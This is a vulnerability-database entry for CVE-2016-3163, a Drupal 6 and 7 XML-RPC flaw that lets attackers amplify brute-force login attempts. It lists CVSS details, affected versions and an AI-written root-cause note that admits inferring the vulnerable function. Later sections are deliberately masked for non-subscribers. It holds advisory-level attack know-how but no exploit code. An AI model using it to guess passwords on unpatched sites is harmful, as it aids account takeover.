Miggo Logo
Miggo Vulnerability Database
CVE-2016-3163

CVE-2016-3163:
Drupal Brute force amplification attacks via XML-RPC

7.5

CVSS Score
3.0

Basic Information

CVE ID
CVE-2016-3163
GHSA ID
GHSA-h3r9-pjmr-f938
EPSS Score
0.73996%
CWE
-
Published
5/17/2022
Updated
5/3/2024
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
drupal/corecomposer>= 7.0, < 7.437.43
drupal/corecomposer>= 6.0, < 6.386.38
drupal/drupalcomposer>= 7.0, < 7.437.43
drupal/drupalcomposer>= 6.0, < 6.386.38

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability specifically affects Drupal 6's Blog API module implementation of XML-RPC methods. The security advisory explicitly states Drupal 6 core was vulnerable via blogapi module methods. The blogapi_blogger_get_user_info is a known authentication method handler that lacked flood control. The core xmlrpc system's ability to process multiple simultaneous calls to the same method (via hook_xmlrpc implementations) created the amplification vector. While exact code isn't shown, Drupal's architecture requires XML-RPC methods to be registered via hook_xmlrpc, and the blogapi module was specifically called out as vulnerable in the CVE description.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

T** XML-RP* syst*m in *rup*l *.x ***or* *.** *n* *.x ***or* *.** mi**t m*k* it **si*r *or r*mot* *tt**k*rs to *on*u*t *rut*-*or** *tt**ks vi* * l*r** num**r o* **lls m*** *t on** to t** s*m* m*t*o*.

Reasoning

T** vuln*r**ility sp**i*i**lly *****ts *rup*l *'s *lo* *PI mo*ul* impl*m*nt*tion o* XML-RP* m*t*o*s. T** s**urity **visory *xpli*itly st*t*s *rup*l * *or* w*s vuln*r**l* vi* *lo**pi mo*ul* m*t*o*s. T** *lo**pi_*lo***r_**t_us*r_in*o is * known *ut**nt